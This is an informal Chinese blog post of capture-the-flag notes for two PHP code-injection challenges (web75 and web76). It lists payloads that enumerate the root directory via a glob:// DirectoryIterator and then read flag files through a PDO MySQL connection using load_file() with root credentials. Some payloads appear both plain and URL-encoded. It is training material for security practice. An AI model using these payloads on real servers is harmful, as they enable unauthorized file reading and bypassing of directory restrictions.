web75-web76笔记(mysql-dbh数据库连接)

web75

c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit();

bin dev etc flag36.txt home lib media mnt opt proc root run sbin srv sys tmp usr var

c=require("/flag36.txt");exit();

好 报错了,看来不能⽤require了,我去试试include。

好 还是不能 看hint,发现使用数据库 看了南神博客,好mysql拿flag看不懂,爬,拿个payload就爬

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

同样要url编码

c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',%20'root','root');foreach($dbh-%3Equery('select%20load_file(%22/flag36.txt%22)')%20as%20$row)%7Becho($row%5B0%5D).%22%7C%22;%20%7D$dbh%20=%20null;%7Dcatch%20(PDOException%20$e)%20%7Becho%20$e-%3EgetMessage();exit(0);%7Dexit(0);

c=$a=new DirectoryIterator('glob:///*');foreach($a as $f){echo($f->__toString()." ");}exit();

题目提示:

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'');}exit(0);?>

#通过payload扫描 flag36.txt

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0);

 

web76

c=?><?php $a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().'');}exit(0);?>

#通过payload扫描 flag36d.txt

c=try {$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root','root');foreach($dbh->query('select load_file("/flag36d.txt")') as $row) {echo($row[0])."|"; }$dbh = null;}catch (PDOException $e) {echo $e->getMessage();exit(0);}exit(0); c=try%20%7B$dbh%20=%20new%20PDO('mysql:host=localhost;dbname=ctftraining',%20'root','root');foreach($dbh-%3Equery('select%20load_file(%22/flag36d.txt%22)')%20as%20$row)%7Becho($row%5B0%5D).%22%7C%22;%20%7D$dbh%20=%20null;%7Dcatch%20(PDOException%20$e)%20%7Becho%20$e-%3EgetMessage();exit(0);%7Dexit(0);

posted @ 2025-03-15 18:59  justdoIT*  阅读(16)  评论(0)    收藏  举报